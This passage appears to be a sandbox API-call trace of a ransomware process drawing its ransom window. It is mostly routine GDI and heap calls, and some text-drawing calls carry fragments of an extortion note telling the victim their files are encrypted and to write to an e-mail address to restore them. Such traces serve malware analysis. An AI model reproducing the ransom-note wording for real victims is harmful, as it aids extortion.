out: lprcDst=0x22e5a8) returned 1 [0113.669] IntersectRect (in: lprcDst=0x22e5a8, lprcSrc1=0x22e5a8, lprcSrc2=0x22ee58 | out: lprcDst=0x22e5a8) returned 1 [0113.669] IntersectRect (in: lprcDst=0x22e5a8, lprcSrc1=0x22e5a8, lprcSrc2=0x22ee58 | out: lprcDst=0x22e5a8) returned 1 [0113.670] IntersectRect (in: lprcDst=0x22e5a8, lprcSrc1=0x22e5a8, lprcSrc2=0x22ee58 | out: lprcDst=0x22e5a8) returned 1 [0113.670] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c02e0 | out: hHeap=0x450000) returned 1 [0113.670] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c02b0 | out: hHeap=0x450000) returned 1 [0113.670] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.670] PtInRect (lprc=0x22f130, pt=0x1e5) returned 1 [0113.670] PtInRect (lprc=0x22efd4, pt=0xbda6) returned 1 [0113.670] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0113.670] GetCursor () returned 0x10003 [0113.670] GetCurrentThreadId () returned 0xe9c [0113.670] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0113.670] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0113.670] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0113.671] GetMessageTime () returned 161835 [0113.671] GetMessagePos () returned 0x1270350 [0113.671] GetCapture () returned 0x0 [0113.671] IntersectRect (in: lprcDst=0x22ee50, lprcSrc1=0x22ee50, lprcSrc2=0x22eee0 | out: lprcDst=0x22ee50) returned 1 [0113.671] IntersectRect (in: lprcDst=0x22ec0c, lprcSrc1=0x22ec0c, lprcSrc2=0x22ebdc | out: lprcDst=0x22ec0c) returned 1 [0113.671] IntersectRect (in: lprcDst=0x22eef0, lprcSrc1=0x22eef0, lprcSrc2=0x22ebfc | out: lprcDst=0x22eef0) returned 1 [0113.671] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.671] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x4c02b0 [0113.671] IntersectRect (in: lprcDst=0x22eef0, lprcSrc1=0x22eef0, lprcSrc2=0x22ec1c | out: lprcDst=0x22eef0) returned 1 [0113.671] IntersectRect (in: lprcDst=0x22e9e0, lprcSrc1=0x22e9e0, lprcSrc2=0x22eee0 | out: lprcDst=0x22e9e0) returned 1 [0113.671] IntersectRect (in: lprcDst=0x22e9e0, lprcSrc1=0x22e9e0, lprcSrc2=0x22eee0 | out: lprcDst=0x22e9e0) returned 1 [0113.671] IntersectRect (in: lprcDst=0x22e79c, lprcSrc1=0x22e79c, lprcSrc2=0x22e76c | out: lprcDst=0x22e79c) returned 1 [0113.671] IntersectRect (in: lprcDst=0x22eef0, lprcSrc1=0x22eef0, lprcSrc2=0x22e78c | out: lprcDst=0x22eef0) returned 1 [0113.671] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.671] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x4c02e0 [0113.671] IntersectRect (in: lprcDst=0x22eef0, lprcSrc1=0x22eef0, lprcSrc2=0x22e7ac | out: lprcDst=0x22eef0) returned 1 [0113.671] IntersectRect (in: lprcDst=0x22e570, lprcSrc1=0x22e570, lprcSrc2=0x22eee0 | out: lprcDst=0x22e570) returned 1 [0113.671] IntersectRect (in: lprcDst=0x22e630, lprcSrc1=0x22e630, lprcSrc2=0x22eee0 | out: lprcDst=0x22e630) returned 1 [0113.671] IntersectRect (in: lprcDst=0x22e630, lprcSrc1=0x22e630, lprcSrc2=0x22eee0 | out: lprcDst=0x22e630) returned 1 [0113.671] IntersectRect (in: lprcDst=0x22e630, lprcSrc1=0x22e630, lprcSrc2=0x22eee0 | out: lprcDst=0x22e630) returned 1 [0113.671] IntersectRect (in: lprcDst=0x22e630, lprcSrc1=0x22e630, lprcSrc2=0x22eee0 | out: lprcDst=0x22e630) returned 1 [0113.671] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c02e0 | out: hHeap=0x450000) returned 1 [0113.671] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c02b0 | out: hHeap=0x450000) returned 1 [0113.671] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.672] ClientToScreen (in: hWnd=0x201f2, lpPoint=0x22f17c | out: lpPoint=0x22f17c) returned 1 [0113.672] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xf8) returned 0x4c7bd8 [0113.672] GetCurrentThreadId () returned 0xe9c [0113.672] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46d8c0 | out: hHeap=0x450000) returned 1 [0113.672] GetCurrentThreadId () returned 0xe9c [0113.672] GetCurrentThreadId () returned 0xe9c [0113.672] PtInRect (lprc=0x22f1b8, pt=0x1e5) returned 1 [0113.673] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x200, wParam=0x0, lParam=0x1e5, plResult=0x22f274 | out: plResult=0x22f274) returned 0x1 [0113.673] NtdllDefWindowProc_W () returned 0x0 [0113.673] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c7bd8 | out: hHeap=0x450000) returned 1 [0113.673] GetMessageTime () returned 161835 [0113.673] GetMessagePos () returned 0x1270350 [0113.673] GetCapture () returned 0x0 [0113.673] ClientToScreen (in: hWnd=0x201f2, lpPoint=0x22f17c | out: lpPoint=0x22f17c) returned 1 [0113.673] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xf8) returned 0x4c7bd8 [0113.673] GetCurrentThreadId () returned 0xe9c [0113.673] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46d8c0 | out: hHeap=0x450000) returned 1 [0113.674] GetCurrentThreadId () returned 0xe9c [0113.674] GetCurrentThreadId () returned 0xe9c [0113.674] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x492ef8 [0113.674] ClientToScreen (in: hWnd=0x201f2, lpPoint=0x22f180 | out: lpPoint=0x22f180) returned 1 [0113.674] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xf8) returned 0x4bcd80 [0113.674] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bcd80 | out: hHeap=0x450000) returned 1 [0113.674] ClientToScreen (in: hWnd=0x201f2, lpPoint=0x22f180 | out: lpPoint=0x22f180) returned 1 [0113.674] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xf8) returned 0x4bcd80 [0113.674] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bcd80 | out: hHeap=0x450000) returned 1 [0113.674] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x492ef8 | out: hHeap=0x450000) returned 1 [0113.675] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x8004, wParam=0x0, lParam=0x1e5, plResult=0x22f274 | out: plResult=0x22f274) returned 0x1 [0113.675] NtdllDefWindowProc_W () returned 0x0 [0113.675] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c7bd8 | out: hHeap=0x450000) returned 1 [0113.675] GetCurrentThreadId () returned 0xe9c [0113.675] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0113.675] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0113.675] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0113.675] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0113.675] MapWindowPoints (in: hWndFrom=0x201f2, hWndTo=0x0, lpPoints=0x22eed4, cPoints=0x1 | out: lpPoints=0x22eed4) returned 19333483 [0113.675] BeginPaint (in: hWnd=0x201f2, lpPaint=0x22f308 | out: lpPaint=0x22f308) returned 0x280101d0 [0113.675] IsRectEmpty (lprc=0x22f310) returned 0 [0113.675] CreateRectRgnIndirect (lprect=0x73d87be0) returned 0x1c0406de [0113.675] GetRandomRgn (hdc=0x280101d0, hrgn=0x1c0406de, i=4) returned 1 [0113.675] OffsetRgn (hrgn=0x1c0406de, x=-363, y=-295) returned 2 [0113.675] MapWindowPoints (in: hWndFrom=0x201f2, hWndTo=0x0, lpPoints=0x22eec4, cPoints=0x1 | out: lpPoints=0x22eec4) returned 19333483 [0113.675] GetDeviceCaps (hdc=0x160101d2, index=38) returned 32409 [0113.675] IntersectRect (in: lprcDst=0x22ef84, lprcSrc1=0x461c5c, lprcSrc2=0x461c4c | out: lprcDst=0x22ef84) returned 1 [0113.675] IntersectRect (in: lprcDst=0x22ef74, lprcSrc1=0x22ef74, lprcSrc2=0x22ee60 | out: lprcDst=0x22ef74) returned 0 [0113.675] IsRectEmpty (lprc=0x22ef74) returned 1 [0113.676] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490ac8 | out: hHeap=0x450000) returned 1 [0113.676] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x50) returned 0x490ac8 [0113.676] GetDeviceCaps (hdc=0x160101d2, index=38) returned 32409 [0113.676] GetDeviceCaps (hdc=0x280101d0, index=14) returned 1 [0113.676] GetDeviceCaps (hdc=0x280101d0, index=12) returned 32 [0113.676] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x50) returned 0x4904f0 [0113.676] CreateCompatibleBitmap (hdc=0x280101d0, cx=714, cy=150) returned 0xb050a7b [0113.679] CreateCompatibleDC (hdc=0x280101d0) returned 0x14010a11 [0113.679] SelectObject (hdc=0x14010a11, h=0xb050a7b) returned 0x185000f [0113.679] GetCurrentObject (hdc=0x280101d0, type=0x5) returned 0x188000b [0113.679] SelectPalette (hdc=0x14010a11, hPal=0x188000b, bForceBkgd=1) returned 0x188000b [0113.679] RealizePalette (hdc=0x14010a11) returned 0x0 [0113.679] GetRegionData (in: hrgn=0x1c0406de, nCount=0x0, lpRgnData=0x0 | out: lpRgnData=0x0) returned 0x30 [0113.679] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x30) returned 0x46d8c0 [0113.679] GetRegionData (in: hrgn=0x1c0406de, nCount=0x30, lpRgnData=0x46d8c0 | out: lpRgnData=0x46d8c0) returned 0x30 [0113.679] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4abac8 [0113.679] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4abac8 | out: hHeap=0x450000) returned 1 [0113.679] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46d8c0 | out: hHeap=0x450000) returned 1 [0113.679] IntersectRect (in: lprcDst=0x22c5ac, lprcSrc1=0x22c5ac, lprcSrc2=0x22c57c | out: lprcDst=0x22c5ac) returned 1 [0113.679] IntersectRect (in: lprcDst=0x22c4dc, lprcSrc1=0x22c4dc, lprcSrc2=0x22c4ac | out: lprcDst=0x22c4dc) returned 1 [0113.680] IntersectRect (in: lprcDst=0x22c3d0, lprcSrc1=0x22c3d0, lprcSrc2=0x22c3c0 | out: lprcDst=0x22c3d0) returned 1 [0113.680] GetObjectType (h=0x280101d0) returned 0x3 [0113.680] GetDeviceCaps (hdc=0x280101d0, index=2) returned 1 [0113.680] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x30) returned 0x46d8c0 [0113.680] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x46d8c0) returned 0x1d04024f [0113.680] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46d8c0 | out: hHeap=0x450000) returned 1 [0113.680] SelectClipRgn (hdc=0x280101d0, hrgn=0x1d04024f) returned 2 [0113.680] DeleteObject (ho=0x1d04024f) returned 1 [0113.680] _CIsqrt () returned 0x3f1a027f [0113.680] _CIsqrt () returned 0x3f1a027f [0113.680] _CIatan2 () returned 0x20 [0113.680] _CIatan2 () returned 0x20 [0113.681] GetStockObject (i=8) returned 0x1b00016 [0113.681] SelectObject (hdc=0x280101d0, h=0x1b00016) returned 0x1b00017 [0113.681] GetViewportOrgEx (in: hdc=0x280101d0, lppoint=0x22c1b4 | out: lppoint=0x22c1b4) returned 1 [0113.681] CreateSolidBrush (color=0xa0a0a0) returned 0x9100a7f [0113.681] SelectObject (hdc=0x280101d0, h=0x9100a7f) returned 0x1900010 [0113.681] UnrealizeObject (h=0x9100a7f) returned 1 [0113.681] SetBrushOrgEx (in: hdc=0x280101d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0113.681] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0113.681] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0113.681] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0113.681] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0113.681] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0113.681] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0113.681] Polygon (hdc=0x280101d0, apt=0x22c0d8, cpt=6) returned 1 [0113.682] SelectObject (hdc=0x280101d0, h=0xc01001d9) returned 0x9100a7f [0113.682] UnrealizeObject (h=0xc01001d9) returned 1 [0113.682] SetBrushOrgEx (in: hdc=0x280101d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0113.682] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0113.682] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0113.682] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0113.682] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0113.682] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0113.682] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0113.682] Polygon (hdc=0x280101d0, apt=0x22c0d8, cpt=8) returned 1 [0113.683] CreateSolidBrush (color=0x696969) returned 0x4100a7a [0113.683] SelectObject (hdc=0x280101d0, h=0x4100a7a) returned 0xc01001d9 [0113.683] UnrealizeObject (h=0x4100a7a) returned 1 [0113.683] SetBrushOrgEx (in: hdc=0x280101d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0113.683] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0113.683] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0113.683] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0113.683] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0113.683] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0113.683] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0113.683] Polygon (hdc=0x280101d0, apt=0x22c0d8, cpt=6) returned 1 [0113.683] CreateSolidBrush (color=0xe3e3e3) returned 0x341009d8 [0113.684] SelectObject (hdc=0x280101d0, h=0x341009d8) returned 0x4100a7a [0113.684] UnrealizeObject (h=0x341009d8) returned 1 [0113.684] SetBrushOrgEx (in: hdc=0x280101d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0113.684] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0113.684] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0113.684] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0113.684] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0113.684] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0113.684] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0113.684] Polygon (hdc=0x280101d0, apt=0x22c0d8, cpt=8) returned 1 [0113.684] SelectObject (hdc=0x280101d0, h=0x1900010) returned 0x341009d8 [0113.684] IntersectRect (in: lprcDst=0x22c510, lprcSrc1=0x22c510, lprcSrc2=0x4a1bb0 | out: lprcDst=0x22c510) returned 1 [0113.684] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x30) returned 0x46d8c0 [0113.684] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x46d8c0) returned 0x1e04024f [0113.684] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46d8c0 | out: hHeap=0x450000) returned 1 [0113.685] SelectClipRgn (hdc=0x280101d0, hrgn=0x1e04024f) returned 2 [0113.685] IntersectRect (in: lprcDst=0x22c2e4, lprcSrc1=0x22c2e4, lprcSrc2=0x22c2b4 | out: lprcDst=0x22c2e4) returned 1 [0113.685] IntersectRect (in: lprcDst=0x4a1bc0, lprcSrc1=0x4a1bc0, lprcSrc2=0x22c2d4 | out: lprcDst=0x4a1bc0) returned 1 [0113.685] IntersectRect (in: lprcDst=0x22c120, lprcSrc1=0x22c120, lprcSrc2=0x4a1bb0 | out: lprcDst=0x22c120) returned 1 [0113.685] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x44) returned 0x4ac540 [0113.685] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4ac540 | out: hHeap=0x450000) returned 1 [0113.685] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x44) returned 0x4ac540 [0113.685] IntersectRect (in: lprcDst=0x229c74, lprcSrc1=0x229c74, lprcSrc2=0x229c44 | out: lprcDst=0x229c74) returned 1 [0113.685] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.685] IntersectRect (in: lprcDst=0x4a1bc0, lprcSrc1=0x4a1bc0, lprcSrc2=0x229b48 | out: lprcDst=0x4a1bc0) returned 1 [0113.685] IntersectRect (in: lprcDst=0x229b48, lprcSrc1=0x229b48, lprcSrc2=0x4a1bd0 | out: lprcDst=0x229b48) returned 1 [0113.685] GetDeviceCaps (hdc=0x14010a11, index=2) returned 1 [0113.685] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x30) returned 0x46d8c0 [0113.685] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x46d8c0) returned 0x41040a7e [0113.685] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46d8c0 | out: hHeap=0x450000) returned 1 [0113.685] SelectClipRgn (hdc=0x14010a11, hrgn=0x41040a7e) returned 2 [0113.685] DeleteObject (ho=0x41040a7e) returned 1 [0113.685] SelectObject (hdc=0x14010a11, h=0xc01001d9) returned 0x1900010 [0113.685] PatBlt (hdc=0x14010a11, x=2, y=0, w=710, h=150, rop=0xf00021) returned 1 [0113.685] SelectObject (hdc=0x14010a11, h=0x1900010) returned 0xc01001d9 [0113.685] IntersectRect (in: lprcDst=0x4a1bc0, lprcSrc1=0x4a1bc0, lprcSrc2=0x229c64 | out: lprcDst=0x4a1bc0) returned 1 [0113.685] IntersectRect (in: lprcDst=0x4a1bc0, lprcSrc1=0x4a1bc0, lprcSrc2=0x229c84 | out: lprcDst=0x4a1bc0) returned 1 [0113.685] IntersectRect (in: lprcDst=0x22993c, lprcSrc1=0x22993c, lprcSrc2=0x22990c | out: lprcDst=0x22993c) returned 1 [0113.686] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.686] IntersectRect (in: lprcDst=0x4a1bc0, lprcSrc1=0x4a1bc0, lprcSrc2=0x229810 | out: lprcDst=0x4a1bc0) returned 1 [0113.686] IntersectRect (in: lprcDst=0x229810, lprcSrc1=0x229810, lprcSrc2=0x4a1bd0 | out: lprcDst=0x229810) returned 1 [0113.686] GetDeviceCaps (hdc=0x14010a11, index=2) returned 1 [0113.686] IntersectRect (in: lprcDst=0x22960c, lprcSrc1=0x22ef74, lprcSrc2=0x22960c | out: lprcDst=0x22960c) returned 1 [0113.686] CreateSolidBrush (color=0x201ccff) returned 0x7100a7c [0113.686] SelectObject (hdc=0x14010a11, h=0x7100a7c) returned 0x1900010 [0113.686] GetStockObject (i=8) returned 0x1b00016 [0113.686] SelectObject (hdc=0x14010a11, h=0x1b00016) returned 0x1b00017 [0113.686] GetROP2 (hdc=0x14010a11) returned 13 [0113.686] SetBkMode (hdc=0x14010a11, mode=2) returned 2 [0113.686] Rectangle (hdc=0x14010a11, left=2, top=0, right=713, bottom=151) returned 1 [0113.686] SetBkMode (hdc=0x14010a11, mode=2) returned 2 [0113.686] SelectObject (hdc=0x14010a11, h=0x1b00017) returned 0x1b00016 [0113.686] SelectObject (hdc=0x14010a11, h=0x1900010) returned 0x7100a7c [0113.686] IntersectRect (in: lprcDst=0x4a1bc0, lprcSrc1=0x4a1bc0, lprcSrc2=0x22992c | out: lprcDst=0x4a1bc0) returned 1 [0113.686] IntersectRect (in: lprcDst=0x4a1bc0, lprcSrc1=0x4a1bc0, lprcSrc2=0x22994c | out: lprcDst=0x4a1bc0) returned 1 [0113.687] IntersectRect (in: lprcDst=0x22944c, lprcSrc1=0x22944c, lprcSrc2=0x229300 | out: lprcDst=0x22944c) returned 1 [0113.687] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.687] IntersectRect (in: lprcDst=0x4a1bc0, lprcSrc1=0x4a1bc0, lprcSrc2=0x22944c | out: lprcDst=0x4a1bc0) returned 1 [0113.687] IntersectRect (in: lprcDst=0x2293b0, lprcSrc1=0x2293b0, lprcSrc2=0x4a1bd0 | out: lprcDst=0x2293b0) returned 1 [0113.687] IntersectRect (in: lprcDst=0x4a1bc0, lprcSrc1=0x4a1bc0, lprcSrc2=0x229364 | out: lprcDst=0x4a1bc0) returned 1 [0113.687] GetDeviceCaps (hdc=0x14010a11, index=2) returned 1 [0113.687] GetCurrentObject (hdc=0x14010a11, type=0x6) returned 0x18a002e [0113.687] SetBkMode (hdc=0x14010a11, mode=1) returned 2 [0113.687] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x0 [0113.688] LsSetDoc () returned 0x0 [0113.688] LsCreateLine () returned 0x0 [0113.688] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.688] LsDisplayLine () returned 0x0 [0113.689] SelectObject (hdc=0x14010a11, h=0xae0a01b1) returned 0x18a002e [0113.689] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x0 [0113.689] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.689] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.689] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.690] _CIsqrt () returned 0x3f1a027f [0113.690] _CIsqrt () returned 0x3f1a027f [0113.690] _CIatan2 () returned 0x20 [0113.690] _CIatan2 () returned 0x20 [0113.690] ExtTextOutW (hdc=0x14010a11, x=306, y=22, options=0x4, lprect=0x228558, lpString="Warning! on. (databases, backups, large excel sheets, etc.) d), and files should not contain valuable inform￿污ࠀ", c=0x8, lpDx=0x228590) returned 1 [0113.690] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.690] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.690] SelectObject (hdc=0x14010a11, h=0xae0a01b1) returned 0xae0a01b1 [0113.691] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.691] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.691] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.691] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.691] _CIsqrt () returned 0x3f1a027f [0113.691] _CIsqrt () returned 0x3f1a027f [0113.691] _CIatan2 () returned 0x20 [0113.691] _CIatan2 () returned 0x20 [0113.691] ExtTextOutW (hdc=0x14010a11, x=407, y=22, options=0x4, lprect=0x228558, lpString=" ", c=0x1, lpDx=0x228590) returned 1 [0113.691] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.691] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.691] LsDestroyLine () returned 0x0 [0113.691] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.691] LsSetDoc () returned 0x0 [0113.692] LsCreateLine () returned 0x0 [0113.692] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.692] LsDisplayLine () returned 0x0 [0113.692] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0xae0a01b1 [0113.692] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.692] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.692] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.693] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.693] _CIatan2 () returned 0x20 [0113.693] _CIatan2 () returned 0x20 [0113.693] ExtTextOutW (hdc=0x14010a11, x=2, y=61, options=0x4, lprect=0x228558, lpString="All your files have been encrypted due to a security problem with your PC. hould not contain valuable inform￿污ࠀ", c=0x4b, lpDx=0x228590) returned 1 [0113.694] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.694] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.695] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.695] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.695] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.695] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.695] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.695] _CIatan2 () returned 0x20 [0113.695] _CIatan2 () returned 0x20 [0113.695] ExtTextOutW (hdc=0x14010a11, x=509, y=61, options=0x4, lprect=0x228558, lpString=" hould not contain valuable inform￿污ࠀ", c=0x1, lpDx=0x228590) returned 1 [0113.695] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.695] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.695] LsDestroyLine () returned 0x0 [0113.695] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.696] LsSetDoc () returned 0x0 [0113.696] LsCreateLine () returned 0x0 [0113.696] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.697] LsDisplayLine () returned 0x0 [0113.697] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.697] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.697] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.697] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.697] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.697] _CIatan2 () returned 0x20 [0113.697] _CIatan2 () returned 0x20 [0113.697] ExtTextOutW (hdc=0x14010a11, x=2, y=79, options=0x4, lprect=0x228558, lpString="If you want to restore them, write us to the e-mail: roblem with your PC. hould not contain valuable inform￿污ࠀ", c=0x2e, lpDx=0x228590) returned 1 [0113.697] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.698] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.698] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.698] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.698] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.698] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.698] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.698] _CIatan2 () returned 0x20 [0113.698] _CIatan2 () returned 0x20 [0113.698] ExtTextOutW (hdc=0x14010a11, x=297, y=79, options=0x4, lprect=0x228558, lpString="-mail: roblem with your PC. hould not contain valuable inform￿污ࠀ", c=0x1, lpDx=0x228590) returned 1 [0113.698] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.698] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.698] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.698] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.698] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.698] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.698] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.698] _CIatan2 () returned 0x20 [0113.698] _CIatan2 () returned 0x20 [0113.698] ExtTextOutW (hdc=0x14010a11, x=302, y=79, options=0x4, lprect=0x228558, lpString="mail: roblem with your PC. hould not contain valuable inform￿污ࠀ", c=0x6, lpDx=0x228590) returned 1 [0113.699] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.699] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.699] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.699] 